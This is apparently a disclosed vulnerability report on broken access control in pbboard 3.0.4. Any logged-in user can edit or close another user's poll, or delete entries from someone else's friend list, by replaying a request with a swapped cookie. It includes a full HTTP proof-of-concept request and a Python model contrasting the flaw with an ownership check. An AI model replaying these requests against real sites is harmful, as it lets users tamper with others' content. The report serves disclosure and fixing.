Broken Access Control in Vote/Friend Function in pbboard/pbboard-3.0.4
Reported on Apr 4th 2023
Description
Unauthorized actions: a logged-in user can modify, close or re-open a poll created by another user, and can delete a friend from another account's friend list by supplying the entry's id.
Proof of Concept
Step 1: Use account 1 to create a poll. Account 2 has no permission to edit, close or open this poll.
Step 2: With Burp Suite, intercept the request sent when account 1 edits, closes or opens the poll.
Step 3: Replace the cookie in account 1's request with account 2's cookie and send the request.
// PoC.js
POST /pbboard/index.php?page=vote&poll_start_edit=1&id=1&subject_id=8 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Origin: http://localhost
Connection: close
Referer: http://localhost/pbboard/index.php?page=vote&poll_edit=1&id=1&subject_id=8&poll_section=2&user=xss
Cookie: CHANGE COOKIE HERE
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
poll_answers_count=0&poll_answers_old=2&question=BAC_EDIT_POLL&answer%5B%5D=Answer+%231&answer%5B%5D=Answer+%231&insert=Edit
Step 4: Reload and view the change: reload as account 2, then reload as account 1.
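As an added illustration (not pbboard's own code), a minimal Python model of the handler behind the poll-edit request above, run once as reported (any logged-in session may edit any poll) and once with the missing ownership check; it also covers the friend-deletion case from the description. Usernames, ids and the moderator role are constructed.

```python
from urllib.parse import parse_qs

# Constructed in-memory state standing in for the forum database.
# account1 created poll 1 (the report's "account 1"); account2 is the other user.
POLLS = {1: {"owner": "account1", "question": "Original", "closed": False}}
FRIENDS = {10: {"owner": "account1", "friend": "account3"}}
MODERATORS = {"admin"}

def authorize(resource_owner, session_user):
    """Server-side ownership check: the acting user must own the resource or
    hold a moderator role. session_user comes from the server-side session
    bound to the cookie, never from a user-controlled request parameter."""
    return resource_owner == session_user or session_user in MODERATORS

def handle_poll_edit(session_user, query, body, enforce_ownership):
    """Dispatch index.php?page=vote&poll_start_edit=1&id=N (the PoC request).
    enforce_ownership=False models the reported behaviour (being logged in is
    the only check); True adds the owner/moderator check that was missing."""
    q = parse_qs(query)
    if q.get("page") != ["vote"] or q.get("poll_start_edit") != ["1"]:
        return 404
    poll = POLLS.get(int(q.get("id", ["0"])[0]))
    if poll is None:
        return 404
    if session_user is None:
        return 401
    if enforce_ownership and not authorize(poll["owner"], session_user):
        return 403
    poll["question"] = parse_qs(body).get("question", [poll["question"]])[0]
    return 200

def handle_friend_delete(session_user, friend_id, enforce_ownership):
    """Friend-list case: the row is selected by id alone, so the check must
    verify that the row belongs to the acting user before deleting it."""
    row = FRIENDS.get(friend_id)
    if row is None:
        return 404
    if session_user is None:
        return 401
    if enforce_ownership and not authorize(row["owner"], session_user):
        return 403
    del FRIENDS[friend_id]
    return 200

def replay_poc(enforce_ownership):
    """Step 3: account2 submits account1's captured edit request with its own
    session. Returns (HTTP status, poll question after the request)."""
    POLLS[1]["question"] = "Original"
    query = "page=vote&poll_start_edit=1&id=1&subject_id=8"
    body = ("poll_answers_count=0&poll_answers_old=2&question=BAC_EDIT_POLL"
            "&answer%5B%5D=Answer+%231&answer%5B%5D=Answer+%231&insert=Edit")
    return handle_poll_edit("account2", query, body, enforce_ownership), POLLS[1]["question"]
```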
Impact
Once such a flaw is discovered, the consequences of a broken access control scheme can be devastating. Beyond viewing unauthorized content, an attacker may be able to change or delete content, perform unauthorized functions, or even take over site administration.
The bug was successfully fixed.
I just checked the BAC error, tried changing the cookie in the request, and it still changes the name of the poll.
Is there a video or images to explain?
Dear sulaiman0dawod, I checked the latest commit and this vulnerability was fixed when changing the name of a poll.